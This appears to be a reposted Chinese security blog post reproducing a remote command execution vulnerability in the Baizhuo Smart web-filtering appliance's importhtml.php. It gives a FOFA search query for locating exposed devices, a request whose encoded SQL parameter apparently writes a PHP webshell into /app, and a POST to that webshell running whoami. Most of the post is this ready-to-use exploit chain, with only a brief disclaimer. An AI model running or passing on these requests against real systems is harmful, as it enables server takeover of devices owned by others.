百卓 Smart importhtml.php 远程命令执行漏洞

本文转载于公众号:融云攻防实验室,原文地址:

漏洞复现 百卓 smart importhtml.php 远程命令执行漏洞

0x01 阅读须知

资源来源于网络,安全小天地只是再次进行分享,使用请遵循本站的免责申明

0x02 漏洞描述

百卓Smart S系列是强大的上网行为管理,设备内置实时更新的最全面的应用识别和URL分类库;过滤各种网络信息内容的能力(包括搜索内容、网络发帖、Email及聊天软件等)。百卓Smart系统存在远程命令执行漏洞,攻击者通过漏洞可以获取服务器权限,导致服务器失陷。

图片[1]-百卓 Smart importhtml.php 远程命令执行漏洞-渗透云记 - 专注于网络安全与技术分享

0x03 漏洞复现

fofa:title=”Smart管理平台”

1.执行写入/app目录下sys1.php木马的poc

/importhtml.php?type=exporthtmlmail&tab=tb_RCtrlLog&sql=c2VsZWN0IDB4M2MzZjcwNjg3MDI

2.调用木马执行whoami命令,得到回显


POST /app/sys1.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0) Gecko/20100101 Firefox/104.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

cmd=whoami
图片[2]-百卓 Smart importhtml.php 远程命令执行漏洞-渗透云记 - 专注于网络安全与技术分享

© 版权声明
THE END
喜欢就支持一下吧
点赞13 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容